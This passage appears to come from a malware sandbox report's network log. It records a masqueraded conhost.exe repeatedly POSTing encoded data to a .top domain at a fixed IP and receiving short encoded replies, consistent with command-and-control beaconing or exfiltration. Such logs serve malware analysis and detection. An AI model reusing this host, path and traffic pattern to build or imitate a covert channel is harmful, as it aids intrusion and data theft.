  Data Raw: 0e 1d 26 07 24 0a 0f 0f 22 05 21 5f 3e 3f 3c 05 30 0e 33 5a 2d 3d 0e 43 27 3f 33 5c 2d 32 39 05 2b 17 0f 02 25 00 0e 00 31 0c 08 57 30 0c 20 5f 0d 10 22 5d 22 06 3e 55 2c 17 0e 04 29 08 2c 43 25 1e 0d 12 30 0d 2d 09 2b 2d 23 0d 26 3f 35 55 24 02 00 56 2f 35 28 10 29 27 3c 1e 37 3b 2d 56 02 1e 22 51 32 38 32 0f 20 3c 36 01 24 38 23 06 21 16 2a 0e 3e 3d 27 05 27 1a 25 06 2a 2d 2b 58 2b 5a 37 5b 21 2a 26 02 20 31 3d 53 27 23 27 5c 20 0d 2d 51 05 34 5a 50
  Data Ascii: &$"!_>?<03Z-=C'?3\-29+%1W0 _"]">U,),C%0-+-#&?5U$V/5()'<7;-V"Q282 <6$8#!*>=''%*-+X+Z7[!*& 1=S'#'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.6 | 49788 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:35.650032043 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:35.996474981 CEST | 1120 | OUT | Data Raw: 58 50 5f 5f 59 46 54 5e 5c 58 57 5a 54 53 55 5b 59 56 59 5e 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XP__YFT^\XWZTSU[YVY^P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT",#+S 8#)=[&-!&8#/0'V0><R&"2$$)>!$(9!F/'P,
Oct 1, 2024 05:58:36.275450945 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:36.408927917 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:36 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.6 | 49789 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:36.545548916 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
Oct 1, 2024 05:58:36.906353951 CEST | 1120 | OUT | Data Raw: 58 54 5f 5c 59 49 54 54 5c 58 57 5a 54 52 55 51 59 55 59 5e 50 59 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XT_\YITT\XWZTRUQYUY^PYVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,#?";Z*!'&;7Y/ %=8W2%4=<18?9!F/'P,
Oct 1, 2024 05:58:37.158543110 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:37.285557032 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:37 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.6 | 49790 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:37.425664902 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:37.777894020 CEST | 1120 | OUT | Data Raw: 5d 52 5f 55 59 48 51 56 5c 58 57 5a 54 59 55 5d 59 55 59 5f 50 59 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]R_UYHQV\XWZTYU]YUY_PYVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9#4!](]>"5^3=2^&^7^,U?W0<&2W2$>_?!;()!F/'P,!
Oct 1, 2024 05:58:38.052000046 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:38.232135057 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:37 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.6 | 49791 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:38.359731913 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:38.715250015 CEST | 1120 | OUT | Data Raw: 58 56 5f 5e 59 40 51 51 5c 58 57 5a 54 5d 55 51 59 50 59 5d 50 5b 56 40 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XV_^Y@QQ\XWZT]UQYPY]P[V@[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"93,!+=T=$.18'Y8##0>S$!92$^>"+9!F/'P,1
Oct 1, 2024 05:58:38.966089964 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:39.107497931 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:38 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.6 | 49792 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:39.232589960 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:39.590984106 CEST | 1120 | OUT | Data Raw: 5d 55 5a 5f 5c 44 54 5f 5c 58 57 5a 54 5d 55 50 59 55 59 59 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]UZ_\DT_\XWZT]UPYUYYPPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".S5*!!['=6X$88/#;T3>R2%$4*<T;?!F/'P,1
Oct 1, 2024 05:58:39.847886086 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:39.987871885 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:39 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.6 | 49793 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:40.107616901 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:40.465281010 CEST | 1120 | OUT | Data Raw: 5d 56 5f 58 59 49 51 55 5c 58 57 5a 54 5c 55 5a 59 56 59 59 50 5a 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]V_XYIQU\XWZT\UZYVYYPZVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-#3T!<\>1=$.X2;8;3<$(1"2!+14U(!F/'P,
Oct 1, 2024 05:58:40.735183001 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:40.871229887 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:40 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.6 | 49794 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:41.000024080 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1112
  Expect: 100-continue
  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.6 | 49795 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:41.268526077 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1840
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:41.621535063 CEST | 1840 | OUT | Data Raw: 58 5d 5f 5c 59 41 54 5f 5c 58 57 5a 54 52 55 59 59 55 59 5c 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: X]_\YAT_\XWZTRUYYUY\P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":03R!')1!$X"_2?-#/%>4R2:W%$Z?1#<9!F/'P,
Oct 1, 2024 05:58:41.914860010 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:42.045919895 CEST | 308 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:41 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
  Data Raw: 0e 1d 25 5f 25 37 2a 52 36 02 25 5f 3e 3f 33 5a 27 34 23 5a 2e 03 0d 19 25 59 38 05 39 32 07 02 2b 39 2e 12 31 3d 33 58 31 21 3a 10 27 36 20 5f 0d 10 22 10 35 5e 32 1d 2d 3a 34 05 29 31 34 09 27 30 27 58 30 33 00 19 28 00 05 0c 33 2f 2a 0d 24 12 26 57 2c 43 3c 13 2a 51 30 54 23 2b 2d 56 02 1e 22 56 24 2b 2e 0f 37 3f 13 5f 27 3b 34 58 22 06 2d 13 29 58 23 03 24 1a 0f 04 29 2e 3f 11 2b 2c 28 00 22 2a 0c 05 37 1f 25 14 33 09 27 5c 20 0d 2d 51 05 34 5a 50
  Data Ascii: %_%7*R6%_>?3Z'4#Z.%Y892+9.1=3X1!:'6 _"5^2-:4)14'0'X03(3/*$&W,C<*Q0T#+-V"V$+.7?_';4X"-)X#$).?+,("*7%3'\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.6 | 49796 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:41.388561010 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:41.747777939 CEST | 1120 | OUT | Data Raw: 58 51 5f 54 59 42 51 52 5c 58 57 5a 54 5f 55 59 59 51 59 59 50 59 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XQ_TYBQR\XWZT_UYYQYYPYVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-U7V!+^=!\0*$(X,3 ',S&%%=(#+9!F/'P,9
Oct 1, 2024 05:58:42.016226053 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:42.147058964 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:41 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.6 | 49797 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:42.294735909 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
Oct 1, 2024 05:58:42.652846098 CEST | 1120 | OUT | Data Raw: 5d 55 5f 54 5c 46 51 53 5c 58 57 5a 54 5c 55 5a 59 57 59 5d 50 5e 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]U_T\FQS\XWZT\UZYWY]P^VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.+"87>1)[$.5&#,U#S$(W%Q&4>1<?!F/'P,
Oct 1, 2024 05:58:42.901942015 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:43.030452967 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:42 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.6 | 49798 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:43.155525923 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:43.512151003 CEST | 1120 | OUT | Data Raw: 58 5d 5f 5c 59 49 54 55 5c 58 57 5a 54 59 55 5c 59 53 59 5b 50 51 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: X]_\YITU\XWZTYU\YSY[PQVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^:3#W5#=5Z3--%+$/08'-($19%$2Z?V+)!F/'P,!
Oct 1, 2024 05:58:43.761688948 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:43.893146992 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:43 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.6 | 49799 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:44.016827106 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:44.372549057 CEST | 1120 | OUT | Data Raw: 58 55 5f 58 59 47 51 51 5c 58 57 5a 54 5e 55 5f 59 5b 59 5a 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XU_XYGQQ\XWZT^U_Y[YZP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:37R">>3>[1+;8<3X(%V$42?"()!F/'P,=
Oct 1, 2024 05:58:44.633979082 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:44.764720917 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:44 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          88192.168.2.64980037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:44.903740883 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:45.262123108 CEST | 1120 | OUT | Data Raw: 5d 57 5f 55 59 48 51 55 5c 58 57 5a 54 59 55 5d 59 57 59 5b 50 5f 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]W_UYHQU\XWZTYU]YWY[P_VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y-'!(8>&$=>%;Y/07V$'%1"&$&<2(!F/'P,!
                                                          Oct 1, 2024 05:58:45.510457039 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:45.638916016 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          89 | 192.168.2.6 | 49801 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 1, 2024 05:58:45.766976118 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:46.121481895 CEST | 1120 | OUT | Data Raw: 5d 56 5a 58 59 44 54 53 5c 58 57 5a 54 58 55 50 59 57 59 5b 50 5f 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZXYDTS\XWZTXUPYWY[P_VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.#W5+)%\$>"[$88;<0V$!:2'2(<V+)!F/'P,%
                                                          Oct 1, 2024 05:58:46.369663000 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:46.500583887 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
